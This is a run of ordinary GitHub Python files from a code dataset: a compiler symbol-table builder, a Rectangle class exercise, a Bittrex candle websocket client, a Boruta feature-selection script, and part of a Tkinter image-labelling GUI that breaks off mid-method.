Project.Lib3_Grammer.main import *\nfrom Tables import *\n\n\n\"\"\"\n1、声明不赋值产生多余 去除字典重复\n2、变量作用域\n3、常量必须赋值不用考虑多余\n\"\"\"\n\n\nregulation = '../Lib3_Grammer/test1'\ncontent = read_file('../Lib3_Grammer/Token/target.reg')\ntree, _ = entry(content, regulation)\nprint(tree.show(key=False))\nd = tree.to_dict(sort=False)\n\n\n\"\"\"div\"\"\"\n\na = {}\nb = {}\nres = []\ncon_res = []\nfun_res = []\n\n\ndef var_type(tree, root, obj, start):\n typ = tree[root]['children'][0]\n obj[1] = typ\n\n\ndef var(tree, root, obj, start):\n name = tree[root]['children'][0]\n obj[2] = name\n if obj[2] not in b:\n b[obj[2]] = []\n b[obj[2]].append(obj[:])\n\n\ndef var_val(tree, root, obj, start):\n val = tree[root]['children'][0]\n obj[3] = val\n res.append(obj[:])\n if obj[2] not in b:\n b[obj[2]] = []\n b[obj[2]].append(obj[:])\n obj[3] = ''\n start[0] += 1\n obj[0] = start[0]\n\n\ndef global_var_declare(tree, root, obj, start):\n child = tree[root]['children']\n for c in child:\n if isinstance(c, dict):\n for k, _ in c.items():\n if k == 'var_type':\n var_type(c, k, obj, start)\n elif k == 'var':\n var(c, k, obj, start)\n elif k == 'con':\n var_val(c, k, obj, start)\n else:\n global_var_declare(c, k, obj, start)\n\n\ndef var_declare(tree, root, obj, start):\n child = tree[root]['children']\n for c in child:\n if isinstance(c, dict):\n for k, _ in c.items():\n if k == 'var_type':\n var_type(c, k, obj, start)\n elif k == 'var':\n var(c, k, obj, start)\n elif k == 'con':\n var_val(c, k, obj, start)\n else:\n var_declare(c, k, obj, start)\n\n\ndef con_type(tree, root, obj, start):\n typ = tree[root]['children'][0]\n obj[1] = typ\n\n\ndef con_declare_list(tree, root, obj, start):\n child = tree[root]['children']\n obj[2] = child[0]\n obj[3] = child[1]['con']['children'][0]\n if obj[2] not in a:\n a[obj[2]] = []\n a[obj[2]].append(obj[:])\n # con_res.append(obj[:])\n\n\ndef con_declare(tree, root, obj, start):\n child = tree[root]['children']\n for c in child:\n if isinstance(c, dict):\n for k, _ in c.items():\n if k == 'con_type':\n con_type(c, k, obj, start)\n elif k == 'con_declare_list':\n con_declare_list(c, k, obj, start)\n else:\n con_declare(c, k, obj, start)\n\n\ndef fun_type(tree, root, obj, start):\n typ = tree[root]['children'][0]\n obj.append(typ)\n\n\ndef fun_declare_fpar(tree, root, obj, start, par):\n child = tree[root]['children']\n for c in child:\n if isinstance(c, dict):\n for k, _ in c.items():\n if k == 'var_type':\n item = c[k]['children'][0]\n par.append(item)\n else:\n fun_declare_fpar(c, k, obj, start, par)\n\n\ndef fun_declare(tree, root, obj, start):\n child = tree[root]['children']\n for c in child:\n if isinstance(c, dict):\n for k, _ in c.items():\n if k == 'fun_type':\n fun_type(c, k, obj, start)\n elif k == 'fun_declare_fpar':\n par = []\n fun_declare_fpar(c, k, obj, start, par)\n obj.append(str(len(par)))\n for i in par:\n obj.append(i)\n fun_res.append(obj[:])\n else:\n fun_declare(c, k, obj, start)\n\n\nroot = 'program'\n\n\ndef create_sign_table(tree, root, start=[1]):\n child = tree[root]['children']\n for c in child:\n for k, _ in c.items():\n\n if k == 'global_var_declare':\n t = c[k]['children'][0]\n s = c[k]['children'][1]\n obj = [start[0], t, s, '']\n global_var_declare(c, k, obj, start)\n pass\n elif k == 'fun_declare':\n s = c[k]['children'][1]\n obj = [start[0], s]\n fun_declare(c, k, obj, start)\n elif k == 'var_declare':\n obj = [start[0], '', '', '']\n var_declare(c, k, obj, start)\n elif k == 'con_declare':\n obj = [start[0], '', '', '']\n con_declare(c, k, obj, start)\n else:\n create_sign_table(c, k)\n # print(len(child))\n pass\n\n\ncreate_sign_table(d, root)\nprint(res)\nprint(a)\nprint(b)\nprint(fun_res)","repo_name":"Miooo00/CompilationPrinciple","sub_path":"Project/Lib4_Semantic_Analyse/signs.py","file_name":"signs.py","file_ext":"py","file_size_in_byte":4730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16061825038","text":"#!/usr/bin/python3\n\"\"\"Defines rectangle class\"\"\"\n\n\nclass Rectangle:\n\n \"\"\"\n Class that defines properties\n\n Attributes:\n width (int): width\n height (int): height\n \"\"\"\n\n number_of_instances = 0\n print_symbol = \"#\"\n\n def __init__(self, width=0, height=0):\n\n \"\"\"Creates new instances\n\n Args:\n width (int, optional): width\n height (int, optional): height\n \"\"\"\n\n self.height = height\n self.width = width\n type(self).number_of_instances += 1\n\n @property\n def width(self):\n\n \"\"\"Width getter\n\n Returns:\n int: the width\n \"\"\"\n\n return self.__width\n\n @property\n def height(self):\n \"\"\"Height getter\n\n Returns:\n int: the height.\n \"\"\"\n\n return self.__height\n\n @width.setter\n def width(self, value):\n\n \"\"\"setter for width\n\n Args:\n value (int): width\n\n Raises:\n TypeError: if width not an integer.\n ValueError: if width < 0.\n \"\"\"\n\n if not isinstance(value, int):\n raise TypeError(\"width must be an integer\")\n elif value < 0:\n\n raise ValueError(\"width must be >= 0\")\n else:\n self.__width = value\n\n @height.setter\n def height(self, value):\n\n \"\"\"setter for height\n\n Args:\n value (int): height\n\n Raises:\n TypeError: if height not an integer.\n ValueError: if height < 0.\n \"\"\"\n\n if not isinstance(value, int):\n raise TypeError(\"height must be an integer\")\n elif value < 0:\n\n raise ValueError(\"height must be >= 0\")\n else:\n self.__height = value\n\n def area(self):\n \"\"\"Calculates area\n\n Returns:\n int: area.\n \"\"\"\n return self.__height * self.__width\n\n def perimeter(self):\n \"\"\"Calculates perimeter\n\n Returns:\n int: perimeter.\n \"\"\"\n\n if self.__height == 0 or self.width == 0:\n return 0\n else:\n\n return 2 * (self.__height + self.__width)\n\n def __str__(self):\n \"\"\"Prints with the character # .\n\n Returns:\n str: rectangle\n \"\"\"\n\n rectangle = []\n\n if self.__width == 0 or self.__height == 0:\n return \"\"\n\n for i in range(self.__height):\n\n for j in range(self.__width):\n\n rectangle.append(str(self.print_symbol))\n rectangle.append(\"\\n\")\n\n # remove blank line\n rectangle.pop()\n\n return \"\".join(rectangle)\n\n def __repr__(self):\n \"\"\" a string\n\n Returns:\n str: rectangle string\n \"\"\"\n return \"Rectangle({:d}, {:d})\".format(self.__width, self.__height)\n\n def __del__(self):\n \"\"\"Deletes instances\n \"\"\"\n print(\"{:s}\".format(\"Bye rectangle...\"))\n type(self).number_of_instances -= 1\n\n @staticmethod\n def bigger_or_equal(rect_1, rect_2):\n\n \"\"\"Computes the area of two rectangles\n\n Args:\n rect_1 (Rectangle): rectangle 1.\n rect_2 (Rectangle): rectangle 2.\n\n Returns:\n Rectangle: the rectangle with the biggest area\n \"\"\"\n\n if not isinstance(rect_1, Rectangle):\n raise TypeError(\"rect_1 must be an instance of Rectangle\")\n\n if not isinstance(rect_2, Rectangle):\n raise TypeError(\"rect_2 must be an instance of Rectangle\")\n\n area_1 = rect_1.area()\n area_2 = rect_2.area()\n\n if area_1 >= area_2:\n return rect_1\n\n return rect_2\n","repo_name":"youssef665/alx-higher_level_programming","sub_path":"0x08-python-more_classes/8-rectangle.py","file_name":"8-rectangle.py","file_ext":"py","file_size_in_byte":3669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42075155402","text":"import traceback\nfrom time import sleep, time\nfrom dateutil.parser import parse\nfrom BL.Exchanges.Bittrex.WebsocketClientLib.websocket_client import BittrexSocket\nfrom Common.Exchange.Candle import Candle\n\n\ndef convert_to_streams(symbols, interval):\n\ttry:\n\t\tif interval == \"1m\":\n\t\t\tinterval_str = \"MINUTE_1\"\n\t\telif interval == \"5m\":\n\t\t\tinterval_str = \"MINUTE_5\"\n\t\telif interval == \"1h\":\n\t\t\tinterval_str = \"HOUR_1\"\n\t\telif interval == \"1d\":\n\t\t\tinterval_str = \"DAY_1\"\n\t\telse:\n\t\t\treturn []\n\t\tstreams = [\"candle_\" + symbol + \"_\" + interval_str for symbol in symbols]\n\t\treturn streams\n\texcept:\n\t\tprint(traceback.format_exc())\n\n\nclass BittrexWebSocket(BittrexSocket):\n\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.callback = None\n\n\tdef exit(self):\n\t\tself.stop()\n\n\tdef start(self, symbols, interval, callback):\n\t\tsuper().start()\n\n\t\tself.callback = callback\n\t\tstreams = convert_to_streams(symbols, interval)\n\t\t# self.subscribe_to_heartbeat()\n\n\t\t# Subscribe to ticker information\n\t\t# Users can also subscribe without introducing delays during invoking but\n\t\t# it is the recommended way when you are subscribing to a large list of tickers.\n\t\tfor stream in streams:\n\t\t\tsleep(0.01)\n\t\t\tself.subscribe_to_candles([stream])\n\t\t# self.subscribe_to_candles(streams)\n\n\tdef stop(self):\n\t\tself.disconnect()\n\n\t# where I receive the messages\n\tasync def on_public(self, msg):\n\t\tif msg[\"invoke_type\"] == \"heartbeat\":\n\t\t\tprint('\\u2661')\n\t\telif msg[\"invoke_type\"] == \"candle\":\n\t\t\t# print(msg)\n\n\t\t\tevent_time_ms = int(time()*1000) #msec\n\t\t\titem = msg['delta']\n\t\t\topen_time_ms = int(parse(item[\"startsAt\"]).timestamp() * 1000) # store as milliseconds\n\n\t\t\tsec_in_ms = 1000\n\t\t\tmin_in_ms = 60 * sec_in_ms\n\t\t\thour_in_ms = 60 * min_in_ms\n\t\t\tday_in_ms = 24 * hour_in_ms\n\n\t\t\tclose_time_ms = 0\n\t\t\tis_closed = False\n\t\t\tinterval = \"\"\n\t\t\tif msg['interval'] == \"MINUTE_1\":\n\t\t\t\tinterval = \"1m\"\n\t\t\t\tclose_time_ms = open_time_ms + min_in_ms\n\t\t\telif msg['interval'] == \"MINUTE_5\":\n\t\t\t\tinterval = \"5m\"\n\t\t\t\tclose_time_ms = open_time_ms + 5*min_in_ms\n\t\t\telif msg['interval'] == \"HOUR_1\":\n\t\t\t\tinterval = \"1h\"\n\t\t\t\tclose_time_ms = open_time_ms + hour_in_ms\n\t\t\telif msg['interval'] == \"DAY_1\":\n\t\t\t\tinterval = \"1d\"\n\t\t\t\tclose_time_ms = open_time_ms + day_in_ms\n\n\t\t\tif 0 < close_time_ms <= event_time_ms:\n\t\t\t\tis_closed = True\n\n\t\t\tcandle = Candle(symbol=msg['marketSymbol'],\n\t\t\t\t\t\t\tinterval=interval,\n\t\t\t\t\t\t\topen_time=open_time_ms,\n\t\t\t\t\t\t\tclose_time=close_time_ms,\n\t\t\t\t\t\t\topen=item[\"open\"],\n\t\t\t\t\t\t\thigh=item[\"high\"],\n\t\t\t\t\t\t\tlow=item[\"low\"],\n\t\t\t\t\t\t\tclose=item[\"close\"],\n\t\t\t\t\t\t\tvolume=item[\"close\"],\n\t\t\t\t\t\t\tquote_asset_volume=item[\"quoteVolume\"],\n\t\t\t\t\t\t\tis_closed=is_closed)\n\t\t\tself.callback(candle, event_time_ms)\n\n\t\telif msg[\"invoke_type\"] == \"trade\":\n\t\t\tprint(msg)\n\n\n","repo_name":"Senior-Develop/SWT-PYQT-APP","sub_path":"BL/Exchanges/Bittrex/BittrexWebSocket.py","file_name":"BittrexWebSocket.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"23668908409","text":"# -*- coding: utf-8 -*-\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport time\nimport numpy as np\nimport pandas as pd\n\nimport matplotlib.pyplot as plt\nplt.rcParams['figure.figsize'] = (12., 6.)\nimport seaborn as sns\nsns.set()\n\n\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.metrics import roc_auc_score\n\nfrom boruta import boruta_py\n\n\nclass ExecutionTime:\n ''' Usage:\n timer = ExecutionTime()\n print('Finished in {:0.2f} minutes.'.format(timer.duration()/60))\n '''\n def __init__(self):\n self.start_time = time.time()\n\n def duration(self):\n return time.time() - self.start_time\n\n\n\nX = pd.read_csv('../input/trainItem_w_features_2.csv')\nX.drop(['itemID_1', 'itemID_2', 'generationMethod'], axis=1, inplace=True)\n\ny = X.pop('isDuplicate')\n\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.20, stratify=y, random_state=27)\n\n\nclf = RandomForestClassifier(n_jobs=10, max_depth=5, class_weight='auto')\n\nfeat_selector = boruta_py.BorutaPy(clf, n_estimators=1000, verbose=2)\n\n# find all relevant features\ntimer = ExecutionTime()\nfeat_selector.fit(X.values, y.values)\nprint('Finished in {:0.2f} minutes.'.format(timer.duration()/60))\n\n# check selected features\ngood_feats = X.columns[feat_selector.support_].tolist()\nprint(good_feats)\n\n\n# check ranking of features\nfeat_selector.ranking_\n\n\n\nclf = RandomForestClassifier(n_estimators=1000, n_jobs=10, max_depth=9, class_weight='auto')\n\nclf.fit(X_train, y_train)\ny_pred = clf.predict_proba(X_test)[:,1]\nscore = roc_auc_score(y_test, y_pred)\nprint(' All feats: {:0.5f}'.format(score))\n\n\nclf.fit(X_train[good_feats], y_train)\ny_pred = clf.predict_proba(X_test[good_feats])[:,1]\nscore = roc_auc_score(y_test, y_pred)\nprint('Good feats: {:0.5f}'.format(score))\n\n\n\n\n\n\n\n\n\n\n","repo_name":"ThakurRajAnand/Avito2016","sub_path":"Python/boruta_feature_importance.py","file_name":"boruta_feature_importance.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70706835433","text":"\nimport sys\nimport tkinter as tk\nimport shutil\nfrom typing import Text\nimport numpy as np\nimport os\nimport pathlib\nimport PIL\nimport cv2\n\nfrom functools import partial\nfrom tkinter import PhotoImage, messagebox as mbox\nfrom PIL import Image\nfrom PIL import ImageTk\nfrom tkinter import filedialog\nfrom osgeo import gdal,ogr,osr\nfrom neural import NeuralFunctions as nf\n\nclass Interface(tk.Frame):\n\n def __init__(self, root):\n\n tk.Frame.__init__(self, root)\n menubar = tk.Menu(self)\n fileMenu = tk.Menu(self)\n \n self.width_size = 800\n self.hight_size = 600\n self.x_crop = 0\n self.y_crop = 0\n self.iterator_x = 256\n self.iterator_y = 256\n self.iterator_recoil = 0.8\n self.cnt_validator = []\n self.background_percent = 0.8\n self.array_clicks = []\n self.draw_lines_array = [[]]\n self.save_draw_array = None\n self.name_tif = ''\n self.name_reference_binary = ''\n self.name_reference_neural = ''\n self.slider_pencil = 10\n self.option_draw = True\n self.bool_draw = False\n self.path_save_img_rgb = 'dataset/rgb'\n self.path_save_img_bin = 'dataset/binario'\n root.maxsize(self.width_size, self.hight_size) \n root.resizable(False,False)\n\n self.f = {\"Back\":\"0\", \"Next\":\"1\"}\n self.first_click = False\n self.first_click_bool = False\n self.ready_start = False\n\n self.change_button = {}\n self.bool_value = tk.StringVar() # Necessario ser como string para funcionar\n self.spn_box_1 = tk.StringVar()\n self.spn_box_2 = tk.StringVar()\n self.spn_box_3 = tk.StringVar()\n self.current_value = tk.DoubleVar()\n self.btn_int = tk.IntVar()\n\n self.var = tk.IntVar()\n self.old_choose = '' \n self.OptionList = [\"Compare Results\",\n \"Draw Weeds\"] \n\n img = ImageTk.PhotoImage(file='icons/icone_sensix.png')\n print(img)\n root.call('wm', 'iconphoto', root._w, img)\n\n self.event2canvas = lambda e, c: (c.canvasx(e.x), c.canvasy(e.y ))\n menubar.add_cascade(label=\"File\", menu=fileMenu)\n fileMenu.add_cascade(label=\"Draw\", command=self.select_image)\n fileMenu.add_cascade(label=\"Choose Neural Network\", command=self.select_image)\n\n def start(self):\n _bgcolor = '#d9d9d9' # X11 color: 'gray85'\n _fgcolor = '#000000' # X11 color: 'black'\n _compcolor = '#d9d9d9' # X11 color: 'gray85'\n _ana1color = '#d9d9d9' # X11 color: 'gray85'\n _ana2color = '#ececec' # Closest X11 color: 'gray92'\n self.style = tk.Style()\n if sys.platform == \"win32\":\n self.style.theme_use('winnative')\n self.style.configure('.',background=_bgcolor)\n self.style.configure('.',foreground=_fgcolor)\n self.style.configure('.',font=\"TkDefaultFont\")\n self.style.map('.',background=\n [('selected', _compcolor), ('active',_ana2color)])\n\n root.geometry(\"527x505+400+200\")\n root.minsize(1, 1)\n root.maxsize(1351, 738)\n root.resizable(1, 1)\n root.title(\"Comparador de Contornos\")\n root.configure(highlightcolor=\"black\")\n\n self.TSeparator1 = tk.Separator(root)\n self.TSeparator1.place(relx=0.021, rely=0.535, relwidth=0.962)\n\n self.menubar = tk.Menu(root,font=\"TkMenuFont\",bg=_bgcolor,fg=_fgcolor)\n root.configure(menu = self.menubar)\n\n self.Scale1 = tk.Scale(root, from_=0.0, to=100.0)\n self.Scale1.place(relx=0.417, rely=0.044, relheight=0.5\n , relwidth=0.173)\n self.Scale1.configure(orient=\"horizontal\")\n self.Scale1.configure(troughcolor=\"#000000\")\n\n self.btn_load_mosaico = tk.Button(root)\n self.btn_load_mosaico.place(relx=0.74, rely=0.572, height=28, width=123)\n self.btn_load_mosaico.configure(takefocus=\"\")\n self.btn_load_mosaico.configure(text='Mosaico')\n self.btn_load_mosaico.bind('', partial(self.get_btn, key=\"0\"))\n\n self.btn_shape_reference = tk.Button(root)\n self.btn_shape_reference.place(relx=0.74, rely=0.659, height=28, width=123)\n self.btn_shape_reference.configure(takefocus=\"\")\n self.btn_shape_reference.configure(text='Shape de Refer')\n self.btn_shape_reference.bind('', partial(self.get_btn, key=\"1\"))\n\n self.btn_shape_neural = tk.Button(root)\n self.btn_shape_neural.place(relx=0.74, rely=0.747, height=28, width=123)\n self.btn_shape_neural.configure(takefocus=\"\")\n self.btn_shape_neural.configure(text='Shape da Rede')\n self.btn_shape_neural.bind('', partial(self.get_btn, key=\"2\"))\n\n self.btn_start = tk.Button(root)\n self.btn_start.place(relx=0.742, rely=0.871, height=48, width=123)\n self.btn_start.configure(takefocus=\"\")\n self.btn_start.configure(text='Iniciar')\n self.btn_start.bind('', partial(self.get_btn, key=\"5\"))\n\n self.spinbox1 = tk.Spinbox(root, from_=10.0, to=800.0, increment=10, textvariable=self.spn_box_1)\n self.spinbox1.place(relx=0.74, rely=0.178, relheight=0.046, relwidth=0.243)\n self.spinbox1.configure(activebackground=\"#f9f9f9\")\n self.spinbox1.configure(background=\"white\")\n self.spinbox1.configure(font=\"TkDefaultFont\")\n self.spinbox1.configure(highlightbackground=\"black\")\n self.spinbox1.configure(selectbackground=\"blue\")\n self.spinbox1.configure(selectforeground=\"white\")\n self.spinbox1.configure(command=self.get_values_spinbox)\n\n self.spinbox2 = tk.Spinbox(root, from_=100.0, to=800.0, increment=100, textvariable=self.spn_box_2)\n self.spinbox2.place(relx=0.74, rely=0.271, relheight=0.046\n , relwidth=0.243)\n self.spinbox2.configure(activebackground=\"#f9f9f9\")\n self.spinbox2.configure(background=\"white\")\n self.spinbox2.configure(font=\"TkDefaultFont\")\n self.spinbox2.configure(highlightbackground=\"black\")\n self.spinbox2.configure(selectbackground=\"blue\")\n self.spinbox2.configure(selectforeground=\"white\")\n self.spinbox2.configure(command=self.get_values_spinbox)\n\n self.spinbox3 = tk.Spinbox(root, from_=100.0, to=800.0, increment=100, textvariable=self.spn_box_3)\n self.spinbox3.place(relx=0.74, rely=0.364, relheight=0.046, relwidth=0.243)\n self.spinbox3.configure(activebackground=\"#f9f9f9\")\n self.spinbox3.configure(background=\"white\")\n self.spinbox3.configure(font=\"TkDefaultFont\")\n self.spinbox3.configure(highlightbackground=\"black\")\n self.spinbox3.configure(selectbackground=\"blue\")\n self.spinbox3.configure(selectforeground=\"white\")\n self.spinbox3.configure(command=self.get_values_spinbox)\n \n \n self.label1 = tk.Label(root)\n self.label1.place(relx=0.015, rely=0.178, height=21, width=245)\n self.label1.configure(activebackground=\"#f9f9f9\")\n self.label1.configure(text='Escolha a porcentagem de iteração :')\n\n self.Radiobutton1 = tk.Radiobutton(root)\n self.Radiobutton1.place(relx=0.721, rely=0.455, relheight=0.046\n , relwidth=0.132)\n self.Radiobutton1.configure(justify='left')\n self.Radiobutton1.configure(text='Padrão', value=True, variable=self.bool_value, command=self.get_values_radio,)\n\n self.label2 = tk.Label(root)\n self.label2.place(relx=0.021, rely=0.269, height=21, width=235)\n self.label2.configure(text='Valor do comprimento da imagem :')\n\n self.label3 = tk.Label(root)\n self.label3.place(relx=0.021, rely=0.36, height=21, width=186)\n self.label3.configure(text='Valor de altura da imagem :')\n\n self.label4 = tk.Label(root)\n self.label4.place(relx=0.014, rely=0.446, height=21, width=186)\n self.label4.configure(text='Usar configuração padrão :')\n\n self.label5 = tk.Label(root)\n self.label5.place(relx=0.023, rely=0.58, height=21, width=138)\n self.label5.configure(text='Selecionar Mosaico :')\n\n self.label6 = tk.Label(root)\n self.label6.place(relx=0.019, rely=0.66, height=21, width=213)\n self.label6.configure(text='Selecionar shape de referencia :')\n\n self.label7 = tk.Label(root)\n self.label7.place(relx=0.019, rely=0.74, height=38, width=221)\n self.label7.configure(text='Selecionar shape da rede neural :')\n\n def labelling_start(self):\n root.minsize(1100, 700)\n #root.maxsize(1351, 738)\n root.resizable(1, 1)\n root.title(\"New rootlevel\")\n\n self.value_label = tk.Label(root, text=self.get_current_value())\n '''\n self.Scale1 = tk.Scale(root, tickinterval=10, from_=0.0, to=100.0)\n self.Scale1.place(relx=0.60, rely=0.85, relheight=0.093\n , relwidth=0.271)\n self.Scale1.configure(length=\"251\")\n self.Scale1.configure(orient=\"horizontal\")\n self.Scale1.configure(troughcolor=\"#d9d9d9\")\n\n '''\n self.Scale2 = tk.Scale(root, tickinterval=5, from_=10.0, to=50.0, command=self.slider_changed, variable=self.current_value)\n self.Scale2.place(relx=0.132, rely=0.88, relheight=0.093, relwidth=0.271)\n self.Scale2.configure(length=\"249\")\n self.Scale2.configure(orient=\"horizontal\")\n self.Scale2.configure(troughcolor=\"#d9d9d9\")\n \n self.next_icon = PhotoImage(file = r\"icons/next.png\")\n self.button_right = tk.Button(root, image = self.next_icon)\n self.button_right.place(relx=0.926, rely=0.363, height=83, width=43)\n self.button_right.configure(borderwidth=\"2\")\n #self.button_right.configure(text='>')\n\n self.back_icon = PhotoImage(file = r\"icons/back.png\")\n self.button_left = tk.Button(root, image = self.back_icon)\n self.button_left.place(relx=0.031, rely=0.363, height=83, width=43)\n self.button_left.configure(borderwidth=\"2\")\n self.button_left.configure(text='<')\n\n frame = tk.Frame(root, bd=2, relief=tk.SUNKEN)\n frame.grid_rowconfigure(0, weight=1)\n frame.grid_columnconfigure(0, weight=1)\n xscroll = tk.Scrollbar(frame, orient=tk.HORIZONTAL)\n #xscroll.grid(row=1, column=0, sticky=tk.E+tk.W)\n yscroll = tk.Scrollbar(frame)\n #yscroll.grid(row=0, column=1, sticky=tk.N+tk.S)\n self.canvas = tk.Canvas(frame, bd=0, width=self.iterator_x, height=self.iterator_y, xscrollcommand=xscroll.set, yscrollcommand=yscroll.set)\n \n #self.canvas = tk.Canvas(frame, bd=0, xscrollcommand=xscroll.set, yscrollcommand=yscroll.set)\n self.canvas.grid(row=0, column=0, sticky=tk.N+tk.S+tk.E+tk.W)\n #xscroll.config(command=self.canvas.xview)\n #yscroll.config(command=self.canvas.yview)\n frame.pack(expand=1)\n\n self.pencil_icon = PhotoImage(file = r\"icons/pencil_2.png\")\n self.pencil_icon = self.pencil_icon.subsample(1, 1)\n self.TButton1 = tk.Button(root, image = self.pencil_icon)\n self.TButton1.place(relx=0.132, rely=0.82, height=40, width=40)\n self.TButton1.configure(borderwidth=\"2\")\n self.TButton1.bind(\"\", partial(self.get_btn, key='6'))\n\n '''self.transp_icon = PhotoImage(file = r\"icons/transparency.png\")\n self.transp_icon = self.transp_icon.subsample(2, 2)\n self.TButton2 = tk.Button(root, image=self.transp_icon)\n self.TButton2.place(relx=0.831, rely=0.82, height=40, width=40)\n # self.TButton2.configure(borderwidth=\"2\")\n self.TButton2.configure(text='2')\n '''\n self.erase_icon = PhotoImage(file = r\"icons/erase.png\")\n self.erase_icon = self.erase_icon.subsample(1, 1)\n self.TButton3 = tk.Button(root, image=self.erase_icon)\n self.TButton3.place(relx=0.180, rely=0.82, height=40, width=40)\n self.TButton3.bind(\"\", partial(self.get_btn, key='7'))\n #self.TButton3.configure(takefocus=\"\")\n #self.TButton3.configure(text='3')\n\n def labelling_menu(self):\n\n self.label1.destroy()\n self.opt.destroy()\n\n self.label1 = tk.Label(root)\n self.label1.place(relx=0.115, rely=0.44, height=21, width=245)\n self.label1.configure(activebackground=\"#f9f9f9\")\n self.label1.configure(text='Escolha a porcentagem de iteração :')\n\n self.btn_load_mosaico = tk.Button(root)\n self.btn_load_mosaico.place(relx=0.72, rely=0.44, height=28, width=123)\n self.btn_load_mosaico.configure(takefocus=\"\")\n self.btn_load_mosaico.configure(text='Mosaico')\n self.btn_load_mosaico.bind('', partial(self.get_btn, key=\"0\"))\n\n self.label2 = tk.Label(root)\n self.label2.place(relx=0.11, rely=0.52, height=21, width=200)\n self.label2.configure(activebackground=\"#f9f9f9\")\n self.label2.configure(text='Selecione o Shape de Base :')\n\n self.btn_shape_reference = tk.Button(root)\n self.btn_shape_reference.place(relx=0.72, rely=0.52, height=28, width=123)\n self.btn_shape_reference.configure(takefocus=\"\")\n self.btn_shape_reference.configure(text='Shape de Base')\n self.btn_shape_reference.bind('', partial(self.get_btn, key=\"3\"))\n\n self.label3 = tk.Label(root)\n self.label3.place(relx=0.117, rely=0.60, height=21, width=260)\n self.label3.configure(activebackground=\"#f9f9f9\")\n self.label3.configure(text='Porcentagem de fundo preto permitida:')\n\n self.spinbox_backg = tk.Spinbox(root, from_=5.0, to=100.0, increment=5, textvariable=self.spn_box_1)\n self.spinbox_backg.place(relx=0.63, rely=0.60, relheight=0.046, relwidth=0.243)\n self.spinbox_backg.configure(activebackground=\"#f9f9f9\")\n self.spinbox_backg.configure(background=\"white\")\n self.spinbox_backg.configure(font=\"TkDefaultFont\")\n self.spinbox_backg.configure(highlightbackground=\"black\")\n self.spinbox_backg.configure(selectbackground=\"blue\")\n self.spinbox_backg.configure(selectforeground=\"white\")\n self.spinbox_backg.configure(command=partial(self.get_values_spinbox, type='Draw Weeds'))\n\n self.btn_start = tk.Button(root)\n self.btn_start.place(relx=0.742, rely=0.871, height=48, width=123)\n self.btn_start.configure(takefocus=\"\")\n self.btn_start.configure(text='Iniciar')\n self.btn_start.bind('', partial(self.get_btn, key=\"5\"))\n\n self.label4 = tk.Label(root)\n self.label4.place(relx=0.117, rely=0.69, height=21, width=235)\n self.label4.configure(text='Valor do comprimento da imagem :')\n\n self.spinbox2 = tk.Spinbox(root, from_=256.0, to=768.0, increment=256, textvariable=self.spn_box_2)\n self.spinbox2.place(relx=0.63, rely=0.69, relheight=0.046, relwidth=0.243)\n self.spinbox2.configure(activebackground=\"#f9f9f9\")\n self.spinbox2.configure(background=\"white\")\n self.spinbox2.configure(font=\"TkDefaultFont\")\n self.spinbox2.configure(highlightbackground=\"black\")\n self.spinbox2.configure(selectbackground=\"blue\")\n self.spinbox2.configure(selectforeground=\"white\")\n self.spinbox2.configure(command=partial(self.get_values_spinbox, type='Draw Weeds'))\n\n self.label5 = tk.Label(root)\n self.label5.place(relx=0.117, rely=0.76, height=21, width=186)\n self.label5.configure(text='Valor de altura da imagem :')\n\n self.spinbox3 = tk.Spinbox(root, from_=256.0, to=400.0, increment=256, textvariable=self.spn_box_3)\n self.spinbox3.place(relx=0.63, rely=0.76, relheight=0.046, relwidth=0.243)\n self.spinbox3.configure(activebackground=\"#f9f9f9\")\n self.spinbox3.configure(background=\"white\")\n self.spinbox3.configure(font=\"TkDefaultFont\")\n self.spinbox3.configure(highlightbackground=\"black\")\n self.spinbox3.configure(selectbackground=\"blue\")\n self.spinbox3.configure(selectforeground=\"white\")\n self.spinbox3.configure(command=partial(self.get_values_spinbox, type='Draw Weeds'))\n\n def first_menu(self, app):\n\n self.logo = PhotoImage(file = r\"icons/Logo-Escuro.png\")\n self.logo = self.logo.subsample(5, 5)\n self.canvas1 = tk.Canvas(root)\n self.canvas1.place(relx=0.117, rely=0.111, relheight=0.291, relwidth=0.752)\n self.canvas1.configure(borderwidth=\"2\")\n self.canvas1.configure(relief=\"ridge\")\n self.canvas1.configure(selectbackground=\"blue\")\n self.canvas1.configure(selectforeground=\"white\")\n self.canvas1.create_image(300,90,image=self.logo, anchor='center')\n\n self.label1 = tk.Label(root)\n self.label1.place(relx=0.25, rely=0.578, height=21, width=200)\n self.label1.configure(text='Selecione uma opção : ')\n\n self.variable = tk.StringVar(app)\n self.variable.set('Choose a Option')\n\n self.opt = tk.OptionMenu(app, self.variable, *self.OptionList)\n #opt.config(width=90, font=('Helvetica', 12))\n self.opt.place(x=self.width_size*0.50, y=self.hight_size*0.57)\n\n self.labelTest = tk.Label(text=\"\", font=('Helvetica', 12), fg='red')\n self.labelTest.pack(side=\"top\")\n\n self.variable.trace(\"w\", self.callback_opt)\n\n def remove_buttons(self, option='First Menu'):\n\n if option == 'Test Neural Network':\n self.btn_selet_image.destroy()\n self.btn_segmentation.destroy()\n self.btn_mask_true.destroy()\n self.btn_diff_imgs.destroy()\n\n self.painel_up_left.destroy()\n self.painel_up_right.destroy()\n self.painel_down_left.destroy()\n self.painel_down_right.destroy()\n\n elif option == 'Compare Results':\n self.TSeparator1.destroy()\n self.btn_load_mosaico.destroy()\n self.btn_shape_reference.destroy()\n self.btn_shape_neural.destroy()\n self.btn_start.destroy()\n self.spinbox1.destroy()\n self.spinbox2.destroy() \n self.spinbox3.destroy() \n self.label1.destroy() \n self.Radiobutton1.destroy() \n self.label2.destroy()\n self.label3.destroy() \n self.label4.destroy()\n self.label5.destroy()\n self.label6.destroy()\n self.label7.destroy()\n\n elif option == 'Draw Menu':\n self.label2.destroy()\n 